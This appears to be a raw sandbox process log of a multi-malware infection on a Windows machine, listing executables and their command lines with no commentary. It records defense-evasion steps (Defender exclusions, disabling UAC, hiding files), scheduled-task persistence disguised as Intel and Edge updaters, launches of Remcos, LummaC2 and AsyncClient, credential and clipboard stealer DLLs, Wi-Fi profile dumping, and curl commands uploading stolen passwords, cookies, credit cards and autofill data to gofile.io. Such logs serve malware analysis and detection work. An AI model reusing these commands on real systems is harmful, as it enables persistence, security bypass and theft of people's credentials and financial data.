C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'

C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'

C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Posing Posing.cmd && Posing.cmd

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.bing.com/search?q=northern+hawk-owl&form=hpcapt&filters=HpDate%3a"20241214_0800"&pc=W000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe28146f8,0x7fffe2814708,0x7fffe2814718

C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Users\Admin\AppData\Local\Temp\1986110042.exe

C:\Users\Admin\AppData\Local\Temp\1986110042.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6428 -ip 6428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 152

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 835450

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Winston + ..\Southwest + ..\W l

C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com

Mineral.com l

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SecureNet Innovations Ltd\NovaGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & exit

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe

"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"

C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe

"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA739.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Windows\svchost.exe

"C:\Windows\svchost.exe"

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\http.exe

"C:\Users\Admin\AppData\Roaming\http.exe"

C:\Users\Admin\AppData\Roaming\Wave.exe

C:\Users\Admin\AppData\Roaming\Wave.exe

C:\Users\Admin\Windows.exe

C:\Users\Admin\Windows.exe

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe9dd46f8,0x7fffe9dd4708,0x7fffe9dd4718

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2556 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_8376_133786560773964288\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp3F06.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

